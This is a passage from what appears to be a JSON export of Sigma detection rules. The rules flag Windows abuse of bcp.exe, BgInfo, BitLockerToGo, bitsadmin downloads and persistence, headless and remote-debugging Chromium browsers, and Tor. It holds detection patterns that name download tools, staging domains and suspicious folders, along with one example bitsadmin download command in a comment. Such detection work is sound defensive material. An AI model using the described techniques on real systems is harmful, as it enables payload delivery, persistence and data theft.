    "content": "title: Data Export From MSSQL Table Via BCP.EXE\nid: c615d676-f655-46b9-b913-78729021e5d7\nstatus: test\ndescription: |\n    Detects the execution of the BCP utility in order to export data from the database.\n    Attackers were seen saving their malware to a database column or table and then later extracting it via \"bcp.exe\" into a file.\nreferences:\n    - https://docs.microsoft.com/en-us/sql/tools/bcp-utility\n    - https://asec.ahnlab.com/en/61000/\n    - https://asec.ahnlab.com/en/78944/\n    - https://www.huntress.com/blog/attacking-mssql-servers\n    - https://www.huntress.com/blog/attacking-mssql-servers-pt-ii\n    - https://news.sophos.com/en-us/2024/08/07/sophos-mdr-hunt-tracks-mimic-ransomware-campaign-against-organizations-in-india/\n    - https://research.nccgroup.com/2018/03/10/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/\nauthor: Omar Khaled (@beacon_exe), MahirAli Khan (in/mahiralikhan), Nasreddine Bencherchali (Nextron Systems)\ndate: 2024-08-20\ntags:\n    - attack.execution\n    - attack.exfiltration\n    - attack.t1048\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\bcp.exe'\n        - OriginalFileName: 'BCP.exe'\n    selection_cli:\n        CommandLine|contains:\n            - ' out ' # Export data from a table\n            - ' queryout ' # Export data based on a SQL query\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate data export operations.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_bginfo_suspicious_child_process.yml",
    "content": "title: Suspicious Child Process Of BgInfo.EXE\nid: 811f459f-9231-45d4-959a-0266c6311987\nrelated:\n    - id: aaf46cdc-934e-4284-b329-34aa701e3771\n      type: similar\nstatus: test\ndescription: Detects suspicious child processes of \"BgInfo.exe\" which could be a sign of potential abuse of the binary to proxy execution via external VBScript\nreferences:\n    - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Bginfo/\n    - https://oddvar.moe/2017/05/18/bypassing-application-whitelisting-with-bginfo/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-08-16\ntags:\n    - attack.execution\n    - attack.t1059.005\n    - attack.defense-evasion\n    - attack.t1218\n    - attack.t1202\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_parent:\n        ParentImage|endswith:\n            - '\\bginfo.exe'\n            - '\\bginfo64.exe'\n    selection_child:\n        - Image|endswith:\n              - '\\calc.exe'\n              - '\\cmd.exe'\n              - '\\cscript.exe'\n              - '\\mshta.exe'\n              - '\\notepad.exe'\n              - '\\powershell.exe'\n              - '\\pwsh.exe'\n              - '\\wscript.exe'\n        - Image|contains:\n              - '\\AppData\\Local\\'\n              - '\\AppData\\Roaming\\'\n              - ':\\Users\\Public\\'\n              - ':\\Temp\\'\n              - ':\\Windows\\Temp\\'\n              - ':\\PerfLogs\\'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_bginfo_uncommon_child_process.yml",
    "content": "title: Uncommon Child Process Of BgInfo.EXE\nid: aaf46cdc-934e-4284-b329-34aa701e3771\nrelated:\n    - id: 811f459f-9231-45d4-959a-0266c6311987\n      type: similar\nstatus: test\ndescription: Detects uncommon child processes of \"BgInfo.exe\" which could be a sign of potential abuse of the binary to proxy execution via external VBScript\nreferences:\n    - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Bginfo/\n    - https://oddvar.moe/2017/05/18/bypassing-application-whitelisting-with-bginfo/\nauthor: Nasreddine Bencherchali (Nextron Systems), Beyu Denis, oscd.community\ndate: 2019-10-26\nmodified: 2023-08-16\ntags:\n    - attack.execution\n    - attack.t1059.005\n    - attack.defense-evasion\n    - attack.t1218\n    - attack.t1202\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith:\n            - '\\bginfo.exe'\n            - '\\bginfo64.exe'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_bitlockertogo_execution.yml",
    "content": "title: BitLockerTogo.EXE Execution\nid: 7f2376f9-42ee-4dfc-9360-fecff9a88fc8\nstatus: test\ndescription: |\n    Detects the execution of \"BitLockerToGo.EXE\".\n    BitLocker To Go is BitLocker Drive Encryption on removable data drives. This feature includes the encryption of, USB flash drives, SD cards, External hard disk drives, Other drives that are formatted by using the NTFS, FAT16, FAT32, or exFAT file system.\n    This is a rarely used application and usage of it at all is worth investigating.\n    Malware such as Lumma stealer has been seen using this process as a target for process hollowing.\nreferences:\n    - https://tria.ge/240521-ynezpagf56/behavioral1\n    - https://any.run/report/6eea2773c1b4b5c6fb7c142933e220c96f9a4ec89055bf0cf54accdcde7df535/a407f006-ee45-420d-b576-f259094df091\n    - https://bazaar.abuse.ch/sample/8c75f8e94486f5bbf461505823f5779f328c5b37f1387c18791e0c21f3fdd576/\n    - https://bazaar.abuse.ch/sample/64e6605496919cd76554915cbed88e56fdec10dec6523918a631754664b8c8d3/\nauthor: Josh Nickels, mttaggart\ndate: 2024-07-11\ntags:\n    - attack.defense-evasion\n    - attack.t1218\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\BitLockerToGo.exe'\n    condition: selection\nfalsepositives:\n    - Legitimate usage of BitLockerToGo.exe to encrypt portable devices.\nlevel: low\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_bitsadmin_download.yml",
    "content": "title: File Download Via Bitsadmin\nid: d059842b-6b9d-4ed1-b5c3-5b89143c6ede\nstatus: test\ndescription: Detects usage of bitsadmin downloading a file\nreferences:\n    - https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin\n    - https://isc.sans.edu/diary/22264\n    - https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/\nauthor: Michael Haag, FPT.EagleEye\ndate: 2017-03-09\nmodified: 2023-02-15\ntags:\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.t1197\n    - attack.s0190\n    - attack.t1036.003\n    - attack.command-and-control\n    - attack.t1105\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\bitsadmin.exe'\n        - OriginalFileName: 'bitsadmin.exe'\n    selection_cmd:\n        CommandLine|contains: ' /transfer '\n    selection_cli_1:\n        CommandLine|contains:\n            - ' /create '\n            - ' /addfile '\n    selection_cli_2:\n        CommandLine|contains: 'http'\n    condition: selection_img and (selection_cmd or all of selection_cli_*)\nfalsepositives:\n    - Some legitimate apps use this, but limited.\nlevel: medium\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_bitsadmin_download/info.yml\nsimulation:\n    - type: atomic-red-team\n      name: Windows - BITSAdmin BITS Download\n      technique: T1105\n      atomic_guid: a1921cd3-9a2d-47d5-a891-f1d0f2a7a31b\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_bitsadmin_download_direct_ip.yml",
    "content": "title: Suspicious Download From Direct IP Via Bitsadmin\nid: 99c840f2-2012-46fd-9141-c761987550ef\nrelated:\n    - id: 90f138c1-f578-4ac3-8c49-eecfd847c8b7\n      type: similar\nstatus: test\ndescription: Detects usage of bitsadmin downloading a file using an URL that contains an IP\nreferences:\n    - https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin\n    - https://isc.sans.edu/diary/22264\n    - https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/\n    - https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-06-28\nmodified: 2023-02-15\ntags:\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.t1197\n    - attack.s0190\n    - attack.t1036.003\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\bitsadmin.exe'\n        - OriginalFileName: 'bitsadmin.exe'\n    selection_flags:\n        CommandLine|contains:\n            - ' /transfer '\n            - ' /create '\n            - ' /addfile '\n    selection_extension:\n        CommandLine|contains:\n            - '://1'\n            - '://2'\n            - '://3'\n            - '://4'\n            - '://5'\n            - '://6'\n            - '://7'\n            - '://8'\n            - '://9'\n    filter_seven_zip:\n        CommandLine|contains: '://7-' # For https://7-zip.org/\n    condition: all of selection_* and not 1 of filter_*\nfalsepositives:\n    - Unknown\nlevel: high\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_bitsadmin_download_direct_ip/info.yml\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_bitsadmin_download_file_sharing_domains.yml",
    "content": "title: Suspicious Download From File-Sharing Website Via Bitsadmin\nid: 8518ed3d-f7c9-4601-a26c-f361a4256a0c\nstatus: test\ndescription: Detects usage of bitsadmin downloading a file from a suspicious domain\nreferences:\n    - https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin\n    - https://isc.sans.edu/diary/22264\n    - https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/\n    - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker\n    - https://www.cisa.gov/uscert/ncas/alerts/aa22-321a\n    - https://www.microsoft.com/en-us/security/blog/2024/01/17/new-ttps-observed-in-mint-sandstorm-campaign-targeting-high-profile-individuals-at-universities-and-research-orgs/\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-06-28\nmodified: 2025-12-10\ntags:\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.t1197\n    - attack.s0190\n    - attack.t1036.003\n    - attack.command-and-control\n    - attack.t1105\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\bitsadmin.exe'\n        - OriginalFileName: 'bitsadmin.exe'\n    selection_flags:\n        CommandLine|contains:\n            - ' /transfer '\n            - ' /create '\n            - ' /addfile '\n    selection_domain:\n        CommandLine|contains:\n            - '.githubusercontent.com'       # Includes both gists and github repositories / Michael Haag (idea)\n            - 'anonfiles.com'\n            - 'cdn.discordapp.com'\n            - 'ddns.net'\n            - 'dl.dropboxusercontent.com'\n            - 'ghostbin.co'\n            - 'github.com' # bitsadmin /transfer n https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1047/bin/calc.dll %PUBLIC%\\calc.dll\n            - 'glitch.me'\n            - 'gofile.io'\n            - 'hastebin.com'\n            - 'mediafire.com'\n            - 'mega.nz'\n            - 
'onrender.com'\n            - 'pages.dev'\n            - 'paste.ee'\n            - 'pastebin.com'\n            - 'pastebin.pl'\n            - 'pastetext.net'\n            - 'privatlab.com'\n            - 'privatlab.net'\n            - 'send.exploit.in'\n            - 'sendspace.com'\n            - 'storage.googleapis.com'\n            - 'storjshare.io'\n            - 'supabase.co'\n            - 'temp.sh'\n            - 'transfer.sh'\n            - 'trycloudflare.com'\n            - 'ufile.io'\n            - 'w3spaces.com'\n            - 'workers.dev'\n    condition: all of selection_*\nfalsepositives:\n    - Some legitimate apps use this, but limited.\nlevel: high\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_bitsadmin_download_file_sharing_domains/info.yml\nsimulation:\n    - type: atomic-red-team\n      name: Windows - BITSAdmin BITS Download\n      technique: T1105\n      atomic_guid: a1921cd3-9a2d-47d5-a891-f1d0f2a7a31b\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_bitsadmin_download_susp_extensions.yml",
    "content": "title: File With Suspicious Extension Downloaded Via Bitsadmin\nid: 5b80a791-ad9b-4b75-bcc1-ad4e1e89c200\nstatus: test\ndescription: Detects usage of bitsadmin downloading a file with a suspicious extension\nreferences:\n    - https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin\n    - https://isc.sans.edu/diary/22264\n    - https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/\nauthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-06-28\nmodified: 2023-05-30\ntags:\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.t1197\n    - attack.s0190\n    - attack.t1036.003\n    - attack.command-and-control\n    - attack.t1105\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\bitsadmin.exe'\n        - OriginalFileName: 'bitsadmin.exe'\n    selection_flags:\n        CommandLine|contains:\n            - ' /transfer '\n            - ' /create '\n            - ' /addfile '\n    selection_extension:\n        CommandLine|contains:\n            - '.7z'\n            - '.asax'\n            - '.ashx'\n            - '.asmx'\n            - '.asp'\n            - '.aspx'\n            - '.bat'\n            - '.cfm'\n            - '.cgi'\n            - '.chm'\n            - '.cmd'\n            - '.dll'\n            - '.gif'\n            - '.jpeg'\n            - '.jpg'\n            - '.jsp'\n            - '.jspx'\n            - '.log'\n            - '.png'\n            - '.ps1'\n            - '.psm1'\n            - '.rar'\n            - '.scf'\n            - '.sct'\n            - '.txt'\n            - '.vbe'\n            - '.vbs'\n            - '.war'\n            - '.wsf'\n            - '.wsh'\n            - '.xll'\n            - '.zip'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\nregression_tests_path: 
regression_data/rules/windows/process_creation/proc_creation_win_bitsadmin_download_susp_extensions/info.yml\nsimulation:\n    - type: atomic-red-team\n      name: Windows - BITSAdmin BITS Download\n      technique: T1105\n      atomic_guid: a1921cd3-9a2d-47d5-a891-f1d0f2a7a31b\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_bitsadmin_download_susp_targetfolder.yml",
    "content": "title: File Download Via Bitsadmin To A Suspicious Target Folder\nid: 2ddef153-167b-4e89-86b6-757a9e65dcac\nrelated:\n    - id: 6e30c82f-a9f8-4aab-b79c-7c12bce6f248\n      type: obsolete\n    - id: 1cf465a1-2609-4c15-9b66-c32dbe4bfd67\n      type: similar\nstatus: test\ndescription: Detects usage of bitsadmin downloading a file to a suspicious target folder\nreferences:\n    - https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin\n    - https://isc.sans.edu/diary/22264\n    - https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/\n    - https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/\nauthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-06-28\nmodified: 2025-12-10\ntags:\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.t1197\n    - attack.s0190\n    - attack.t1036.003\n    - attack.command-and-control\n    - attack.t1105\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\bitsadmin.exe'\n        - OriginalFileName: 'bitsadmin.exe'\n    selection_flags:\n        CommandLine|contains:\n            - ' /transfer '\n            - ' /create '\n            - ' /addfile '\n    selection_folder:\n        CommandLine|contains:\n            - ':\\Perflogs'\n            - ':\\ProgramData\\'\n            - ':\\Temp\\'\n            - ':\\Users\\Public\\'\n            - ':\\Windows\\'\n            - '\\$Recycle.Bin\\'\n            - '\\AppData\\Local\\'\n            - '\\AppData\\Roaming\\'\n            - '\\Contacts\\'\n            - '\\Desktop\\'\n            - '\\Favorites\\'\n            - '\\Favourites\\'\n            - '\\inetpub\\wwwroot\\'\n            - '\\Music\\'\n            - '\\Pictures\\'\n            - '\\Start Menu\\Programs\\Startup\\'\n            - '\\Users\\Default\\'\n            - '\\Videos\\'\n            - '%ProgramData%'\n            - '%public%'\n          
  - '%temp%'\n            - '%tmp%'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_bitsadmin_download_susp_targetfolder/info.yml\nsimulation:\n    - type: atomic-red-team\n      name: Windows - BITSAdmin BITS Download\n      technique: T1105\n      atomic_guid: a1921cd3-9a2d-47d5-a891-f1d0f2a7a31b\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_bitsadmin_potential_persistence.yml",
    "content": "title: Monitoring For Persistence Via BITS\nid: b9cbbc17-d00d-4e3d-a827-b06d03d2380d\nstatus: test\ndescription: |\n    BITS will allow you to schedule a command to execute after a successful download to notify you that the job is finished.\n    When the job runs on the system the command specified in the BITS job will be executed.\n    This can be abused by actors to create a backdoor within the system and for persistence.\n    It will be chained in a BITS job to schedule the download of malware/additional binaries and execute the program after being downloaded.\nreferences:\n    - https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html\n    - http://0xthem.blogspot.com/2014/03/t-emporal-persistence-with-and-schtasks.html\n    - https://isc.sans.edu/diary/Wipe+the+drive+Stealthy+Malware+Persistence+Mechanism+-+Part+1/15394\nauthor: Sreeman\ndate: 2020-10-29\nmodified: 2024-01-25\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1197\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_img:\n        - Image|endswith: '\\bitsadmin.exe'\n        - OriginalFileName: 'bitsadmin.exe'\n    selection_cli_notify_1:\n        CommandLine|contains: '/SetNotifyCmdLine'\n    selection_cli_notify_2:\n        CommandLine|contains:\n            - '%COMSPEC%'\n            - 'cmd.exe'\n            - 'regsvr32.exe'\n    selection_cli_add_1:\n        CommandLine|contains: '/Addfile'\n    selection_cli_add_2:\n        CommandLine|contains:\n            - 'http:'\n            - 'https:'\n            - 'ftp:'\n            - 'ftps:'\n    condition: selection_img and (all of selection_cli_notify_* or all of selection_cli_add_*)\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_browsers_chromium_headless_debugging.yml",
    "content": "title: Potential Data Stealing Via Chromium Headless Debugging\nid: 3e8207c5-fcd2-4ea6-9418-15d45b4890e4\nrelated:\n    - id: b3d34dc5-2efd-4ae3-845f-8ec14921f449\n      type: derived\nstatus: test\ndescription: Detects chromium based browsers starting in headless and debugging mode and pointing to a user profile. This could be a sign of data stealing or remote control\nreferences:\n    - https://github.com/defaultnamehere/cookie_crimes/\n    - https://mango.pdf.zone/stealing-chrome-cookies-without-a-password\n    - https://embracethered.com/blog/posts/2020/cookie-crimes-on-mirosoft-edge/\n    - https://embracethered.com/blog/posts/2020/chrome-spy-remote-control/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-12-23\ntags:\n    - attack.defense-evasion\n    - attack.credential-access\n    - attack.collection\n    - attack.t1185\n    - attack.t1564.003\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains|all:\n            - '--remote-debugging-' # Covers: --remote-debugging-address, --remote-debugging-port, --remote-debugging-socket-name, --remote-debugging-pipe....etc\n            - '--user-data-dir'\n            - '--headless'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_browsers_chromium_headless_exec.yml",
    "content": "title: Browser Execution In Headless Mode\nid: ef9dcfed-690c-4c5d-a9d1-482cd422225c\nrelated:\n    - id: 0e8cfe08-02c9-4815-a2f8-0d157b7ed33e\n      type: derived\nstatus: test\ndescription: Detects execution of Chromium based browser in headless mode\nreferences:\n    - https://twitter.com/mrd0x/status/1478234484881436672?s=12\n    - https://www.trendmicro.com/en_us/research/23/e/managed-xdr-investigation-of-ducktail-in-trend-micro-vision-one.html\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-09-12\ntags:\n    - attack.defense-evasion\n    - attack.command-and-control\n    - attack.t1105\n    - attack.t1564.003\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith:\n            - '\\brave.exe'\n            - '\\chrome.exe'\n            - '\\msedge.exe'\n            - '\\opera.exe'\n            - '\\vivaldi.exe'\n        CommandLine|contains: '--headless'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: low\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_browsers_chromium_headless_file_download.yml",
    "content": "title: File Download with Headless Browser\nid: 0e8cfe08-02c9-4815-a2f8-0d157b7ed33e\nrelated:\n    - id: ef9dcfed-690c-4c5d-a9d1-482cd422225c\n      type: derived\nstatus: test\ndescription: Detects execution of chromium based browser in headless mode using the \"dump-dom\" command line to download files\nreferences:\n    - https://twitter.com/mrd0x/status/1478234484881436672?s=12\n    - https://www.trendmicro.com/en_us/research/23/e/managed-xdr-investigation-of-ducktail-in-trend-micro-vision-one.html\nauthor: Sreeman, Florian Roth (Nextron Systems)\ndate: 2022-01-04\nmodified: 2025-10-07\ntags:\n    - attack.defense-evasion\n    - attack.command-and-control\n    - attack.t1105\n    - attack.t1564.003\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith:\n            - '\\brave.exe'\n            - '\\chrome.exe'\n            - '\\msedge.exe'\n            - '\\opera.exe'\n            - '\\vivaldi.exe'\n        CommandLine|contains|all:\n            - '--headless'\n            - 'dump-dom'\n            - 'http'\n    filter_optional_edge_1:\n        Image|startswith:\n            - 'C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\'\n            - 'C:\\Program Files (x86)\\Microsoft\\EdgeCore\\'\n            - 'C:\\Program Files (x86)\\Microsoft\\EdgeWebView\\'\n            - 'C:\\Program Files\\Microsoft\\Edge\\Application\\'\n            - 'C:\\Program Files\\Microsoft\\EdgeCore\\'\n            - 'C:\\Program Files\\Microsoft\\EdgeWebView\\'\n            - 'C:\\Program Files\\WindowsApps\\Microsoft.MicrosoftEdge'\n        Image|endswith:\n            - '\\msedge.exe'\n            - '\\msedgewebview2.exe'\n            - '\\MicrosoftEdge.exe'\n        CommandLine|contains: '--headless --disable-gpu --disable-extensions --disable-plugins --mute-audio --no-first-run --incognito --aggressive-cache-discard --dump-dom'\n    filter_optional_edge_2:\n        Image|contains:\n            - 
'\\AppData\\Local\\Microsoft\\WindowsApps\\'\n            - '\\Windows\\SystemApps\\Microsoft.MicrosoftEdge'\n        Image|endswith:\n            - '\\msedge.exe'\n            - '\\MicrosoftEdge.exe'\n        CommandLine|contains: '--headless --disable-gpu --disable-extensions --disable-plugins --mute-audio --no-first-run --incognito --aggressive-cache-discard --dump-dom'\n    condition: selection and not 1 of filter_optional_*\nfalsepositives:\n    - Unknown\nlevel: high\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_browsers_chromium_headless_file_download/info.yml\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_browsers_chromium_load_extension.yml",
    "content": "title: Chromium Browser Instance Executed With Custom Extension\nid: 88d6e60c-759d-4ac1-a447-c0f1466c2d21\nrelated:\n    - id: 27ba3207-dd30-4812-abbf-5d20c57d474e\n      type: similar\nstatus: test\ndescription: Detects a Chromium based browser process with the 'load-extension' flag to start a instance with a custom extension\nreferences:\n    - https://redcanary.com/blog/chromeloader/\n    - https://emkc.org/s/RJjuLa\n    - https://www.mandiant.com/resources/blog/lnk-between-browsers\nauthor: Aedan Russell, frack113, X__Junior (Nextron Systems)\ndate: 2022-06-19\nmodified: 2023-11-28\ntags:\n    - attack.persistence\n    - attack.t1176.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith:\n            - '\\brave.exe'\n            - '\\chrome.exe'\n            - '\\msedge.exe'\n            - '\\opera.exe'\n            - '\\vivaldi.exe'\n        CommandLine|contains: '--load-extension='\n    condition: selection\nfalsepositives:\n    - Usage of Chrome Extensions in testing tools such as BurpSuite will trigger this alert\nlevel: medium\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_browsers_chromium_load_extension/info.yml\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_browsers_chromium_mockbin_abuse.yml",
    "content": "title: Chromium Browser Headless Execution To Mockbin Like Site\nid: 1c526788-0abe-4713-862f-b520da5e5316\nstatus: test\ndescription: Detects the execution of a Chromium based browser process with the \"headless\" flag and a URL pointing to the mockbin.org service (which can be used to exfiltrate data).\nreferences:\n    - https://www.zscaler.com/blogs/security-research/steal-it-campaign\nauthor: X__Junior (Nextron Systems)\ndate: 2023-09-11\ntags:\n    - attack.execution\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_img:\n        Image|endswith:\n            - '\\brave.exe'\n            - '\\chrome.exe'\n            - '\\msedge.exe'\n            - '\\opera.exe'\n            - '\\vivaldi.exe'\n    selection_headless:\n        CommandLine|contains: '--headless'\n    selection_url:\n        CommandLine|contains:\n            - '://run.mocky'\n            - '://mockbin'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_browsers_chromium_mockbin_abuse/info.yml\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_browsers_chromium_susp_load_extension.yml",
    "content": "title: Suspicious Chromium Browser Instance Executed With Custom Extension\nid: 27ba3207-dd30-4812-abbf-5d20c57d474e\nrelated:\n    - id: 88d6e60c-759d-4ac1-a447-c0f1466c2d21\n      type: similar\nstatus: test\ndescription: Detects a suspicious process spawning a Chromium based browser process with the 'load-extension' flag to start an instance with a custom extension\nreferences:\n    - https://redcanary.com/blog/chromeloader/\n    - https://emkc.org/s/RJjuLa\n    - https://www.mandiant.com/resources/blog/lnk-between-browsers\nauthor: Aedan Russell, frack113, X__Junior (Nextron Systems)\ndate: 2022-06-19\nmodified: 2023-11-28\ntags:\n    - attack.persistence\n    - attack.t1176.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith:\n            - '\\cmd.exe'\n            - '\\cscript.exe'\n            - '\\mshta.exe'\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n            - '\\regsvr32.exe'\n            - '\\rundll32.exe'\n            - '\\wscript.exe'\n        Image|endswith:\n            - '\\brave.exe'\n            - '\\chrome.exe'\n            - '\\msedge.exe'\n            - '\\opera.exe'\n            - '\\vivaldi.exe'\n        CommandLine|contains: '--load-extension='\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_browsers_chromium_susp_load_extension/info.yml\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_browsers_inline_file_download.yml",
    "content": "title: File Download From Browser Process Via Inline URL\nid: 94771a71-ba41-4b6e-a757-b531372eaab6\nstatus: test\ndescription: Detects execution of a browser process with a URL argument pointing to a file with a potentially interesting extension. This can be abused to download arbitrary files or to hide from the user for example by launching the browser in a minimized state.\nreferences:\n    - https://twitter.com/mrd0x/status/1478116126005641220\n    - https://lolbas-project.github.io/lolbas/Binaries/Msedge/\nauthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-01-11\nmodified: 2025-10-27\ntags:\n    - attack.command-and-control\n    - attack.t1105\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        Image|endswith:\n            - '\\brave.exe'\n            - '\\chrome.exe'\n            - '\\msedge.exe'\n            - '\\opera.exe'\n            - '\\vivaldi.exe'\n    selection_http:\n        CommandLine|contains: 'http'\n    selection_extensions:\n        - CommandLine|endswith:\n              - '.7z'\n              - '.dat'\n              - '.dll'\n              - '.exe'\n              - '.hta'\n              - '.ps1'\n              - '.psm1'\n              - '.txt'\n              - '.vbe'\n              - '.vbs'\n              - '.zip'\n        - CommandLine|contains:\n              - '.7z\"'\n              - '.dat\"'\n              - '.dll\"'\n              - '.hta\"'\n              - '.ps1\"'\n              - '.psm1\"'\n              - '.txt\"'\n              - '.vbe\"'\n              - '.vbs\"'\n              - '.zip\"'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_browsers_inline_file_download/info.yml\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_browsers_remote_debugging.yml",
    "content": "title: Browser Started with Remote Debugging\nid: b3d34dc5-2efd-4ae3-845f-8ec14921f449\nrelated:\n    - id: 3e8207c5-fcd2-4ea6-9418-15d45b4890e4\n      type: derived\nstatus: test\ndescription: Detects browsers starting with the remote debugging flags. Which is a technique often used to perform browser injection attacks\nreferences:\n    - https://yoroi.company/wp-content/uploads/2022/05/EternityGroup_report_compressed.pdf\n    - https://www.mdsec.co.uk/2022/10/analysing-lastpass-part-1/\n    - https://github.com/defaultnamehere/cookie_crimes/\n    - https://github.com/wunderwuzzi23/firefox-cookiemonster\nauthor: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-07-27\nmodified: 2022-12-23\ntags:\n    - attack.credential-access\n    - attack.collection\n    - attack.t1185\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_chromium_based:\n        # Covers: --remote-debugging-address, --remote-debugging-port, --remote-debugging-socket-name, --remote-debugging-pipe....etc\n        CommandLine|contains: ' --remote-debugging-'\n    selection_firefox:\n        Image|endswith: '\\firefox.exe'\n        CommandLine|contains: ' -start-debugger-server'\n    condition: 1 of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_browsers_tor_execution.yml",
    "content": "title: Tor Client/Browser Execution\nid: 62f7c9bf-9135-49b2-8aeb-1e54a6ecc13c\nstatus: test\ndescription: Detects the use of Tor or Tor-Browser to connect to onion routing networks\nreferences:\n    - https://www.logpoint.com/en/blog/detecting-tor-use-with-logpoint/\nauthor: frack113\ndate: 2022-02-20\nmodified: 2025-10-27\ntags:\n    - attack.command-and-control\n    - attack.t1090.003\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - Description: 'Tor Browser'\n        - Product: 'Tor Browser'\n        - Image|endswith:\n              - '\\tor.exe'\n              - '\\Tor Browser\\Browser\\firefox.exe'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_browsers_tor_execution/info.yml\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_calc_uncommon_exec.yml",
